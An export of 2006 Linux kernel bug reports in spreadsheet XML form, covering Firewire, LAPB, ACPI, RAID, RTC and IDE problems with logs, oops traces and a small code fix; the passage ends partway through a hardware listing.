    <t>Most recent kernel where this bug did not occur: 2.6.17.7 Distribution: Fedora Core 5 (with fedora and vanilla kernels) Hardware Environment: P3-S 1400MHz, 512MB, intel chipset 02:09.0 FireWire (IEEE 1394): Texas Instruments TSB12LV23 IEEE-1394 Controller (prog-if 10 [OHCI]) Subsystem: Texas Instruments Unknown device 8010 Flags: bus master, medium devsel, latency 32, IRQ 21 Memory at ec800000 (32-bit, non-prefetchable) [size=2K] Memory at ec000000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 1 Software Environment: Problem Description: I have a Firewire/USB module, from Initio, chipset 1530, date 2005 (so not an old one). USB side works fine without issues. When connecting the Firewire module (and reloading the ohci1394 module), the folliwing output is generated: scsi2 : SBP-2 IEEE-1394 ieee1394: sbp2: Workarounds for node 0-00:1023: 0x2 (firmware_revision 0x000243, vendor_id 0x001010, model_id 0x000540) ieee1394: sbp2: Logged into SBP-2 device ieee1394: Node 0-00:1023: Max speed [S400] - Max payload [2048] Vendor: Initio Model: SP2014N Rev: 2.43 Type: Direct-Access ANSI SCSI revision: 00 SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) sda: Write Protect is on sda: Mode Sense: 00 13 00 af SCSI device sda: drive cache: write back SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) sda: Write Protect is on sda: Mode Sense: 00 13 00 af SCSI device sda: drive cache: write back sda: unknown partition table sd 2:0:0:0: Attached scsi disk sda Note that the device is recognized with "Write protect on", which is not the case. One hint is that the USB side works fine, so cable and HD cannot be. The problem persists also if the workarounds are disabled (workaround=0x100). I'm going to try the thing under windows, but it will requre some time. Final note, it seems to me that, some kernels ago, this unit was working properly, I tested the device around October/November 2005 and it did everything properly. Steps to reproduce: Attach the device, reload the ohci1394, dmesg or try to write to the HD.</t>
  </si>
  <si>
    <t>Initio 2430 sbp2 controller not properly handled</t>
  </si>
  <si>
    <t>2006-08-02 12:34 UTC</t>
  </si>
  <si>
    <t>2006-10-01 15:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Core 5 (with fedora and vanilla kernels) Hardware Environment: P3-S 1400MHz, 512MB, intel chipset 02:09.0 FireWire (IEEE 1394): Texas Instruments TSB12LV23 IEEE-1394 Controller (prog-if 10 [OHCI]) Subsystem: Texas Instruments Unknown device 8010 Flags: bus master, medium devsel, latency 32, IRQ 21 Memory at ec800000 (32-bit, non-prefetchable) [size=2K] Memory at ec000000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 1 Problem Description: The Initio 2430 is a FW800 sbp2/3 controller, of course backward compatible to FW100/200/400. Actually connected in FW400 mode, with a FW400&lt;-&gt;FW800 cable (unit date 2005). Plugging the device, the following output is produced: scsi3 : SBP-2 IEEE-1394 ieee1394: sbp2: Workarounds for node 0-00:1023: 0x2 (firmware_revision 0x000242, vendor_id 0x001010, model_id 0x000000) ieee1394: sbp2: Logged into SBP-2 device ieee1394: Node 0-00:1023: Max speed [S400] - Max payload [2048] Vendor: Initio Model: SP2014N Rev: 2.42 Type: Direct-Access ANSI SCSI revision: 00 SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) sda: Write Protect is off sda: Mode Sense: 86 0b 00 02 sda: missing header in MODE_SENSE response SCSI device sda: drive cache: write back SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) sda: Write Protect is off sda: Mode Sense: 86 0b 00 02 sda: missing header in MODE_SENSE response SCSI device sda: drive cache: write back sda: unknown partition table sd 3:0:0:0: Attached scsi disk sda Note the "missing header in MODE_SENSE response", which does not sound too good. Anyway, the problem occurs when trasfering data to the device, sometimes the copy locks with: ieee1394: sbp2: sbp2util_node_write_no_wait failed. ieee1394: sbp2: aborting sbp2 command sd 3:0:0:0: command: cdb[0]=0x2a: 2a 00 11 35 18 d8 00 00 f8 00 ieee1394: sbp2: sbp2util_node_write_no_wait failed. it restarts and, it seems, there is no data corruption. I read around, this seems to be "common", sometimes blamed to the firmware of the unit. serializing or not makes little difference, only the errors are in sequence or overlapped. Disabling workarounds does not bring anything. Initio does not seem to have firmware updates for this unit. Together with the other, I'm planning to test this thing under windows and see what it says... Steps to reproduce: cp some_files /mnt/initio2430, dmesg...</t>
  </si>
  <si>
    <t>Check of windowsize in LAPB doesn't work for window sizes in the range of 8 .. 127</t>
  </si>
  <si>
    <t>2006-08-03 08:41 UTC</t>
  </si>
  <si>
    <t>Norbert Reinartz</t>
  </si>
  <si>
    <t>2006-08-06 11:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: P4 Software Environment: gcc 3.3.5 Problem Description: Function lapb_setparms() in file net/lapb/lapb_iface.c checks if the given parameters are valid. If the given window size is in the range of 8 .. 127, lapb_setparms() fails and returns an error value of LAPB_INVALUE, even if bit LAPB_EXTENDED in parms-&gt;mode is set. If bit LAPB_EXTENDED in parms-&gt;mode is set and the window size is in the range of 8 .. 127, the first check "(parms-&gt;mode &amp; LAPB_EXTENDED)" results true and the second check "(parms-&gt;window &lt; 1 || parms-&gt;window &gt; 127)" results false. Both checks in conjunction result to false, thus the third check "(parms-&gt;window &lt; 1 || parms-&gt;window &gt; 7)" is done by fault. This third check results true, so that we leave lapb_setparms() by 'goto out_put'. Seems that this bug doesn't cause any problems, because lapb_setparms() isn't used to change the default values of LAPB. We are using kernel lapb in our software project and also change the default parameters of lapb, so we found this bug. original code: -------------- int lapb_setparms(struct net_device *dev, struct lapb_parms_struct *parms) { int rc = LAPB_BADTOKEN; struct lapb_cb *lapb = lapb_devtostruct(dev); if (!lapb) goto out; rc = LAPB_INVALUE; if (parms-&gt;t1 &lt; 1 || parms-&gt;t2 &lt; 1 || parms-&gt;n2 &lt; 1) goto out_put; if (lapb-&gt;state == LAPB_STATE_0) { if (((parms-&gt;mode &amp; LAPB_EXTENDED) &amp;&amp; (parms-&gt;window &lt; 1 || parms-&gt;window &gt; 127)) || (parms-&gt;window &lt; 1 || parms-&gt;window &gt; 7)) goto out_put; lapb-&gt;mode = parms-&gt;mode; lapb-&gt;window = parms-&gt;window; } lapb-&gt;t1 = parms-&gt;t1 * HZ; lapb-&gt;t2 = parms-&gt;t2 * HZ; lapb-&gt;n2 = parms-&gt;n2; rc = LAPB_OK; out_put: lapb_put(lapb); out: return rc; } changed code with fixed bug: ---------------------------- int lapb_setparms(struct net_device *dev, struct lapb_parms_struct *parms) { int rc = LAPB_BADTOKEN; struct lapb_cb *lapb = lapb_devtostruct(dev); if (!lapb) goto out; rc = LAPB_INVALUE; if (parms-&gt;t1 &lt; 1 || parms-&gt;t2 &lt; 1 || parms-&gt;n2 &lt; 1) goto out_put; if (lapb-&gt;state == LAPB_STATE_0) { if (parms-&gt;mode &amp; LAPB_EXTENDED) { if (parms-&gt;window &lt; 1 || parms-&gt;window &gt; 127) goto out_put; } else { if (parms-&gt;window &lt; 1 || parms-&gt;window &gt; 7) goto out_put; } lapb-&gt;mode = parms-&gt;mode; lapb-&gt;window = parms-&gt;window; } lapb-&gt;t1 = parms-&gt;t1 * HZ; lapb-&gt;t2 = parms-&gt;t2 * HZ; lapb-&gt;n2 = parms-&gt;n2; rc = LAPB_OK; out_put: lapb_put(lapb); out: return rc; }</t>
  </si>
  <si>
    <t>CPU load increases very fast on kernels &gt;= 2.6.15</t>
  </si>
  <si>
    <t>2006-08-04 13:44 UTC</t>
  </si>
  <si>
    <t>Miroslav Jany</t>
  </si>
  <si>
    <t>2007-11-29 08:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.4, probably whole 2.6.13.x tree Distribution: CentOS 4.3 x86_64 Hardware Environment: Dell PowerEdge 2950, 1 x dualcore Xeon @ 3.2 GHz (w/o HyperThreading), 2GB of FB-DIMM RAM Software Environment: mprime, gcc, probably others Problem Description: After upgrading to the latest 2.6.17.7 kernel and running several stress tests to "prepare" machine for full production use, we discovered that the CPU load tends to increase at a very fast, unusual rate. First we thought it was the mprime's torture test that rendered the machine totally unusable after 3 minutes of stress-testing, and the machine rebooted itself (due to software watchdog). Even when compiling kernel sources, the load goes really high - after half and a minute, it is going above the value of 10. The same happens with latest 2.6.16.27 and 2.6.15.7. Haven't tried any of the 2.6.14.x tree, but when using 2.6.13.4, all of the above mentioned problems do not happen. Have tried 2.6.17.7 on a PowerEdge 2850, which is quite identical to the HW configuration of 2950's, except that it is a 2 x Xeon @ 3.2 GHz, non-dualcore, and the mentioned problems do not happen there. Steps to reproduce: 1) run mprime's torture test with 2-CPU option 2) compile kernel sources with "make -j3 bzImage modules"</t>
  </si>
  <si>
    <t>Kernel doesn't re-sync usb-raid1 after running mdadm --add</t>
  </si>
  <si>
    <t>2006-08-06 01:18 UTC</t>
  </si>
  <si>
    <t>Adrian Ulrich</t>
  </si>
  <si>
    <t>2008-03-26 23:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18-rc2 Distribution: Slackintosh-Current Hardware Environment: Mac-Mini (ppc) : Internal Harddisk (rootfs) mirrored to an external USB2 Harddrive Problem Description: The internal harddrive of my MacMini is mirrored to an external USB2-Harddrive via md-raid1. Because the kernel doesn't attach the usb-device (sda2) to my raid (md0) itself (after a reboot) i'm using something like this in my /etc/rc.d/rc.local: &gt; #!/bin/sh &gt; postfix start (&lt;-- note: postfix ist started before attaching sda2) &gt; /sbin/mdadm --manage /dev/md0 --add /dev/sda2 This worked well with kernels below 2.6.18-rc2 : A full sync from hda3 -&gt; sda2 was started after each reboot. Beginning with 2.6.18-rc2 the kernel didn't sync the drive after attaching it: It was added to the raid without a full resync. According to 'iostat' the kernel does write to both devices *after* mdadm attached the harddrive but it seems like everything written to md0 before attaching sda2 will never make it to sda2 :-( : Example: -------- mdadm --manage /dev/md0 -f /dev/hda3 mdadm --manage /dev/md0 -r /dev/hda3 #sda2 is now the only active disk of md0 mount /dev/hda3 /mnt/bla # cat /var/spool/postfix/pid/master.pid 649 # cat /mnt/bla/var/spool/postfix/pid/master.pid 413 &lt;-- ouch!</t>
  </si>
  <si>
    <t>Karsten Keil</t>
  </si>
  <si>
    <t>Steinar H. Gunderson</t>
  </si>
  <si>
    <t>Reading battery state causes oops, or  AE_NOT_FOUND or AE_AML_OPERAND_TYPE</t>
  </si>
  <si>
    <t>2.6.15.22, 2.6.17.7</t>
  </si>
  <si>
    <t>2006-08-09 07:50 UTC</t>
  </si>
  <si>
    <t>Johan Rutgeerts</t>
  </si>
  <si>
    <t>2007-03-08 00:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown (also occurs with 2.6.15.22) Distribution: Ubuntu Hardware Environment: 686 Software Environment: kde Problem Description: frequent (e.g. daily) kernel oopses: [17186277.420000] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000002 [17186277.420000] printing eip: [17186277.420000] c01f156a [17186277.420000] *pde = 00000000 [17186277.420000] Oops: 0000 [#1] [17186277.420000] SMP [17186277.420000] Modules linked in: binfmt_misc rfcomm l2cap bluetooth ppdev speedstep_ich speedstep_lib cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video button battery container ac dm_mod ipv6 af_packet md_mod ide_cs lp pcmcia 3c59x snd_intel8x0 snd_ac97_codec snd_ac97_bus yenta_socket rsrc_nonstatic mii pcmcia_core joydev snd_pcm_oss snd_mixer_oss hw_random snd_pcm snd_timer snd parport_pc parport psmouse soundcore snd_page_alloc floppy intel_agp agpgart shpchp pci_hotplug serio_raw tsdev evdev usbhid ext3 jbd mbcache ide_generic uhci_hcd usbcore ide_cd cdrom ide_disk piix generic thermal processor fan vga16fb cfbcopyarea vgastate cfbimgblt cfbfillrect [17186277.420000] CPU: 0 [17186277.420000] EIP: 0060:[acpi_ex_store+273/519] Not tainted VLI [17186277.420000] EFLAGS: 00210282 (2.6.17.7 #1) [17186277.420000] EIP is at acpi_ex_store+0x111/0x207 [17186277.420000] eax: 00000000 ebx: dfe7b8bc ecx: 00000000 edx: 00000000 [17186277.420000] esi: 00000000 edi: dfe7b754 ebp: 00000014 esp: d9ee3e04 [17186277.420000] ds: 007b es: 007b ss: 0068 [17186277.420000] Process hald (pid: 3808, threadinfo=d9ee2000 task=defd1030) [17186277.420000] Stack: dfe7b8bc d87ed5bc 00000000 d87ed400 c01f0eea d87ed400 d87ed5bc 00000003 [17186277.420000] 00000000 dfe7b8bc d87ed400 00000000 c75a93a0 00000007 c01e84a8 d9ee3e60 [17186277.420000] d87ed400 00000000 d87ed5ec c01f61b3 e080bfac 00000000 00200286 c75a9288 [17186277.420000] Call Trace: [17186277.420000] &lt;c01f0eea&gt; acpi_ex_opcode_2A_1T_1R+0x33b/0x368 &lt;c01e84a8&gt; acpi_ds_exec_end_op+0xb3/0x363 [17186277.420000] &lt;c01f61b3&gt; acpi_ps_parse_loop+0x55f/0x848 &lt;c01f5acb&gt; acpi_ps_parse_aml+0x45/0x1ce [17186277.420000] &lt;c01f68c8&gt; acpi_ps_execute_pass+0x6b/0x7b &lt;c01f698c&gt; acpi_ps_execute_method+0xb4/0x140 [17186277.420000] &lt;c01f3fcd&gt; acpi_ns_evaluate_by_handle+0xd1/0x12a &lt;c01f4137&gt; acpi_ns_evaluate_relative+0xa7/0xc8 [17186277.420000] &lt;c01f38cd&gt; acpi_evaluate_object+0x109/0x1b4 &lt;c0170003&gt; __link_path_walk+0x4b2/0xed4 [17186277.420000] &lt;e0a5a66b&gt; acpi_battery_read_state+0x94/0x242 [battery] &lt;c0180129&gt; seq_read+0x0/0x2ba [17186277.420000] &lt;c0180190&gt; seq_read+0x67/0x2ba &lt;c0180129&gt; seq_read+0x0/0x2ba [17186277.420000] &lt;c01623fd&gt; vfs_read+0xa2/0x158 &lt;c0162ea0&gt; sys_read+0x41/0x6a [17186277.420000] &lt;c0102ceb&gt; sysenter_past_esp+0x54/0x75 [17186277.420000] Code: 8b 43 18 8b 38 89 e2 89 f0 e8 1d 96 00 00 89 c2 85 c0 0f 85 01 01 00 00 31 f6 85 ff 75 0a eb 13 89 f8 e8 b2 97 00 00 46 8b 43 10 &lt;0f&gt; b7 40 02 39 c6 72 ed 8b 53 18 8b 04 24 89 02 be 01 00 00 00 [17186277.420000] EIP: [acpi_ex_store+273/519] acpi_ex_store+0x111/0x207 SS:ESP 0068:d9ee3e04 dmesg output of similar oops'es for other kernel versions can be found at &lt;http://people.mech.kuleuven.be/~jrutgeer/oopses/&gt;. Greetings, Johan</t>
  </si>
  <si>
    <t>Computer freezes plugging card into yenta slot</t>
  </si>
  <si>
    <t>2.6.17 and higher</t>
  </si>
  <si>
    <t>2006-08-10 09:57 UTC</t>
  </si>
  <si>
    <t>2007-03-01 11:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian testing Hardware Environment: Acer TravelMate 242 Software Environment: Problem Description: Steps to reproduce: plug card into slot see dmesg output</t>
  </si>
  <si>
    <t>e1000 doesn't update trafic counters frequently enough</t>
  </si>
  <si>
    <t>2006-08-11 02:27 UTC</t>
  </si>
  <si>
    <t>Olivier Cortes</t>
  </si>
  <si>
    <t>2007-12-04 09:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none (this is still occuring in 2.6.18-rc4) Distribution: Ubuntu Hardware Environment: IBM T40p Software Environment: Ubuntu Dapper up-to-date, 686 kernel Problem Description: see http://lkml.org/lkml/2003/12/20/30 Steps to reproduce: just use any graphing applet and set the update interval smaller than 2 seconds (netspeed has 1 second per default, I use it at 500ms) see Ubuntu bug : https://launchpad.net/distros/ubuntu/+source/linux-source-2.6.15/+bug/55989</t>
  </si>
  <si>
    <t>intel agp doesn't detect e7221 chipset</t>
  </si>
  <si>
    <t>2006-08-11 07:38 UTC</t>
  </si>
  <si>
    <t>John Lewis</t>
  </si>
  <si>
    <t>2008-03-26 23:25 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: NA Distribution: Gentoo Hardware Environment: Dell Poweredge SC420 BIOS ver A02 Software Environment: NA Problem Description: intel-agp doesn't detect e7221 chipset.This means DRM doesn't detect the integrated i915 graphics controller. agpgart, intel-agp, drm and i915 all load without complaint though dmesg just shows:- Linux agpgart interface v0.101 (c) Dave Jones [drm] Initialized drm 1.0.1 20051102 Steps to reproduce: Get a machine with a e7221 chipset. Install latest main line kernel with agpgart, intel-agp, drm and i915 support enabled.</t>
  </si>
  <si>
    <t>WARNING: drivers/acpi/processor.o - Section mismatch: reference to .init.data: from .text between 'acpi_processor_power_init' (at offset 0x13e2) and 'acpi_processor_power_exit'</t>
  </si>
  <si>
    <t>2.6.17.8</t>
  </si>
  <si>
    <t>2006-08-11 14:40 UTC</t>
  </si>
  <si>
    <t>Alper Belgen</t>
  </si>
  <si>
    <t>2007-02-19 13:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Slackware Linux 10.2 (32-Bit) Hardware Environment: AMD Athlon 64, 512MB Kingston DDR400, A8N-SLI Mainboard Software Environment: KDE 3.5.3 Problem Description: WARNING: drivers/acpi/processor.o - Section mismatch: reference to .init.data: from .text between 'acpi_processor_power_init' (at offset 0x13e2) and 'acpi_processor_power_exit'. I can't use Cool'n'Quiet. Steps to reproduce:</t>
  </si>
  <si>
    <t>Dan Williams</t>
  </si>
  <si>
    <t>Clock runs approx 3 times as fast with 2.6.18-rc4 on amd64 with ati chipset</t>
  </si>
  <si>
    <t>2006-08-15 01:34 UTC</t>
  </si>
  <si>
    <t>hofrichter</t>
  </si>
  <si>
    <t>2006-08-19 17:03 UTC</t>
  </si>
  <si>
    <t>Hi it noticed that the system clock runs three times as fast with the newest kernel 2.6.18-rc4. With the older kernel 2.6.17 it works fine. Was the timer code changed between these two releases ? My system is an amd64 notebook (nx6125) with ati chipset. Trying no_timer_check, disable_timer_pin_1 or acpi=off at the boot prompt did not succeed.</t>
  </si>
  <si>
    <t>intellimouse explorer 2.0 doesn't work on 2.6.18-rc4</t>
  </si>
  <si>
    <t>2006-08-15 05:50 UTC</t>
  </si>
  <si>
    <t>ville palo</t>
  </si>
  <si>
    <t>2006-09-06 23:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 or 2.6.17 Distribution: Debian Hardware Environment: Microsoft IntelliMouse Explorer 2.0 Problem Description: Mouse pointer doesn't behave as it should be. Pointer is randomly jumpping all around the screen. I found out that the enabling Intellimouse 4.0 horizontal scrolling is somehow causing this. from psmouse-base.c: /* Magic to enable horizontal scrolling on IntelliMouse 4.0 */ param[0] = 200; ps2_command(ps2dev, param, PSMOUSE_CMD_SETRATE); param[0] = 80; ps2_command(ps2dev, param, PSMOUSE_CMD_SETRATE); param[0] = 40; ps2_command(ps2dev, param, PSMOUSE_CMD_SETRATE); param[0] = 200; ps2_command(ps2dev, param, PSMOUSE_CMD_SETRATE); param[0] = 200; ps2_command(ps2dev, param, PSMOUSE_CMD_SETRATE); param[0] = 60; ps2_command(ps2dev, param, PSMOUSE_CMD_SETRATE);</t>
  </si>
  <si>
    <t>rtc doesn't generate updates on T60p</t>
  </si>
  <si>
    <t>2006-08-16 12:14 UTC</t>
  </si>
  <si>
    <t>Jerry Quinn</t>
  </si>
  <si>
    <t>2008-09-22 16:56 UTC</t>
  </si>
  <si>
    <t>timers_realtime-clock</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian testing Hardware Environment: IBM T60p Software Environment: Problem Description: Trying to read from /dev/rtc blocks indefinitely. If I use the simple test program in rtc.txt.gz, it hangs on the read and never returns. The program appears to turn on update interrupts, before reading. I see the same problem in Debian's latest 2.6.16 and a vanilla 2.6.18-rc4 kernel. Steps to reproduce: fd = open("/dev/rtc", O_RDONLY); ioctl(fd, RTC_UIE_ON, 0); read(fd, &amp;data, sizeof(unsigned long));</t>
  </si>
  <si>
    <t>kernel BUG on multiple resets</t>
  </si>
  <si>
    <t>2006-08-18 06:05 UTC</t>
  </si>
  <si>
    <t>Michal/ Mirosl/aw</t>
  </si>
  <si>
    <t>2006-12-01 12:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo, vanilla kernel Hardware Environment: 00:1f.1 IDE interface: Intel Corporation 82801DB (ICH4) IDE Controller (rev 01) broken HDD: Maxtor QuickView 250GB (makes weird sounds when starting and reports 0/0/0 geometry) Software Environment: Linux qmqm 2.6.17.8 #1 PREEMPT Fri Aug 18 13:11:40 CEST 2006 i686 Intel(R) Pentium(R) 4 CPU 1.80GHz GenuineIntel GNU/Linux hdparm v6.6 Problem Description: kernel BUG at drivers/ide/ide.c:1370 Steps to reproduce: [power cycle HDD] [wait couple secs] # hdparm -I /dev/hda /dev/hda: HDIO_DRIVE_CMD(identify) failed: Input/output error # hdparm -w /dev/hda /dev/hda: # hdparm -w /dev/hda /dev/hda: Segmentation fault # dmesg|tail -n NN hda: set_geometry_intr: status=0x51 { DriveReady SeekComplete Error } hda: set_geometry_intr: error=0x04 { DriveStatusError } ide: failed opcode was: 0xec hda: recal_intr: status=0x51 { DriveReady SeekComplete Error } hda: recal_intr: error=0x04 { DriveStatusError } ide: failed opcode was: 0xa1 ------------[ cut here ]------------ kernel BUG at drivers/ide/ide.c:1370! invalid opcode: 0000 [#1] PREEMPT Modules linked in: bridge llc irda crc_ccitt iptable_filter ip_tables x_tables snd_seq_midi snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_opl3_synth snd_seq_instr snd_seq_midi_emul snd_ainstr_fm snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_mixer_oss snd_bt87x snd_dummy radeon drm ext2 mbcache lp pl2303 usbserial intel_agp uhci_hcd agpgart usb_storage scsi_mod ehci_hcd 8250_pnp i2c_i801 i2c_core snd_emu10k1 snd_ac97_codec snd_ac97_bus snd_util_mem e100 emu10k1_gp 8139too 8139cp 8250 serial_core snd_cmipci ns558 gameport snd_pcm snd_page_alloc snd_opl3_lib snd_timer snd_hwdep snd_mpu401_uart snd_rawmidi snd_seq_device snd serio_raw CPU: 0 EIP: 0060:[&lt;c0261470&gt;] Not tainted VLI EFLAGS: 00210086 (2.6.17.8 #1) EIP is at generic_ide_ioctl+0x39a/0x454 eax: c165b9c0 ebx: 00200202 ecx: 00000001 edx: 00000000 esi: c051a5d4 edi: 0000031c ebp: da44fee0 esp: da44fe7c ds: 007b es: 007b ss: 0068 Process hdparm (pid: 11750, threadinfo=da44e000 task=dda88030) Stack: df369800 dd73a300 c02bd002 0000012b 00000001 c0509398 00000000 da44feac c011d9c0 00200046 da44fec4 c1503f04 000000b1 da44e000 da44fec4 c0134fca 00000128 00000128 da44fefc c0135e6e 00000002 00000000 0000031c dfde0e00 Call Trace: &lt;c0103a8a&gt; show_stack_log_lvl+0x82/0x8a &lt;c0103be3&gt; show_registers+0x112/0x17a &lt;c0103db7&gt; die+0xf8/0x1cc &lt;c0103f07&gt; do_trap+0x7c/0x96 &lt;c0104172&gt; do_invalid_op+0x95/0x9c &lt;c0103733&gt; error_code+0x4f/0x54 &lt;c026b80a&gt; idedisk_ioctl+0x21/0x26 &lt;c0202d49&gt; blkdev_driver_ioctl+0x49/0x5a &lt;c0202f11&gt; blkdev_ioctl+0x1b7/0x1c3 &lt;c0156963&gt; block_ioctl+0x16/0x1b &lt;c015f45f&gt; do_ioctl+0x27/0x67 &lt;c015f727&gt; vfs_ioctl+0x188/0x196 &lt;c015f77a&gt; sys_ioctl+0x45/0x5f &lt;c0102b9b&gt; sysenter_past_esp+0x54/0x75 Code: c0 0f 84 d4 00 00 00 9c 5b fa b8 01 00 00 00 e8 fd 46 eb ff ba ef 48 38 c0 89 f0 e8 26 0d 00 00 8b 46 6c 8b 40 08 83 38 00 74 08 &lt;0f&gt; 0b 5a 05 76 48 38 c0 c7 40 08 01 00 00 00 53 9d b8 01 00 00 EIP: [&lt;c0261470&gt;] generic_ide_ioctl+0x39a/0x454 SS:ESP 0068:da44fe7c &lt;6&gt;note: hdparm[11750] exited with preempt_count 1 ------------[ cut here ]------------ [now sleep a while] # dmesg|tail -n 3 &lt;6&gt;note: hdparm[11750] exited with preempt_count 1 ------------[ cut here ]------------ ide0: reset timed-out, status=0x80 # hdparm -w /dev/hda /dev/hda: # dmesg|tail -n 4 &lt;6&gt;note: hdparm[11750] exited with preempt_count 1 ------------[ cut here ]------------ ide0: reset timed-out, status=0x80 ide0: reset: success Parameters saved by kernel after boot: # hdparm -i /dev/hda /dev/hda: Model=Maxtor SABRE, FwRev=BAH42F9Z, SerialNo= Config={ Fixed } RawCHS=0/0/0, TrkSize=0, SectSize=0, ECCbytes=0 BuffType=unknown, BuffSize=0kB, MaxMultSect=0 (maybe): CurCHS=0/0/0, CurSects=0, LBA=no IORDY=no PIO modes: pio0 AdvancedPM=no * signifies the current active mode /var/log/dmesg fragment about IDE boot-time detection: Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH4: IDE controller at PCI slot 0000:00:1f.1 ACPI: PCI Interrupt 0000:00:1f.1[A] -&gt; GSI 18 (level, low) -&gt; IRQ 169 ICH4: chipset revision 1 ICH4: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:pio, hdb:pio ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:pio Probing IDE interface ide0... hda: Maxtor SABRE, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: SAMSUNG SP8004H, ATA DISK drive ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 128KiB hda: 0 sectors (0 MB), CHS=0/0/0 hda: INVALID GEOMETRY: 0 PHYSICAL HEADS? hdc: max request size: 128KiB hdc: 156368016 sectors (80060 MB) w/2048KiB Cache, CHS=65535/16/63, UDMA(100) hdc: cache flushes supported hdc: hdc1 hdc2 hdc3 hdc4 The same fragment when the disk was alive: Aug 11 11:26:00 [kernel] Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 Aug 11 11:26:01 [kernel] ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx Aug 11 11:26:01 [kernel] ICH4: IDE controller at PCI slot 0000:00:1f.1 Aug 11 11:26:01 [kernel] ACPI: PCI Interrupt 0000:00:1f.1[A] -&gt; GSI 18 (level, low) -&gt; IRQ 16 Aug 11 11:26:01 [kernel] ICH4: chipset revision 1 Aug 11 11:26:01 [kernel] ICH4: not 100% native mode: will probe irqs later Aug 11 11:26:01 [kernel] ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:DMA, hdb:pio Aug 11 11:26:01 [kernel] ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:pio Aug 11 11:26:01 [kernel] Probing IDE interface ide0... Aug 11 11:26:01 [kernel] hda: Maxtor 6L250R0, ATA DISK drive Aug 11 11:26:01 [kernel] ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Aug 11 11:26:01 [kernel] Probing IDE interface ide1... Aug 11 11:26:01 [kernel] hdc: SAMSUNG SP8004H, ATA DISK drive Aug 11 11:26:01 [kernel] ide1 at 0x170-0x177,0x376 on irq 15 Aug 11 11:26:01 [kernel] hda: max request size: 512KiB Aug 11 11:26:01 [kernel] hda: 488397168 sectors (250059 MB) w/16384KiB Cache, CHS=30401/255/63, UDMA(100) Aug 11 11:26:01 [kernel] hda: cache flushes supported Aug 11 11:26:01 [kernel] hda: hda1 hda2 hda3 hda4 Aug 11 11:26:01 [kernel] hdc: max request size: 128KiB Aug 11 11:26:01 [kernel] hdc: 156368016 sectors (80060 MB) w/2048KiB Cache, CHS=65535/16/63, UDMA(100) Aug 11 11:26:01 [kernel] hdc: cache flushes supported Aug 11 11:26:01 [kernel] hdc: hdc1 hdc2 hdc3 hdc4 /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 1.80GHz stepping : 4 cpu MHz : 1797.115 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm up bogomips : 3598.25 lspci: 00:00.0 Host bridge: Intel Corporation 82845 845 (Brookdale) Chipset Host Bridge (rev 11) 00:01.0 PCI bridge: Intel Corporation 82845 845 (Brookdale) Chipset AGP Bridge (rev 11) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 81) 00:1f.0 ISA bridge: Intel Corporation 82801DB/DBL (ICH4/ICH4-L) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801DB (ICH4) IDE Controller (rev 01) 00:1f.3 SMBus: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 01) 01:00.0 VGA compatible controller: ATI Technologies Inc RV350 AP [Radeon 9600] 01:00.1 Display controller: ATI Technologies Inc RV350 AP [Radeon 9600] (Secondary) 02:01.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 02) 02:03.0 Multimedia audio 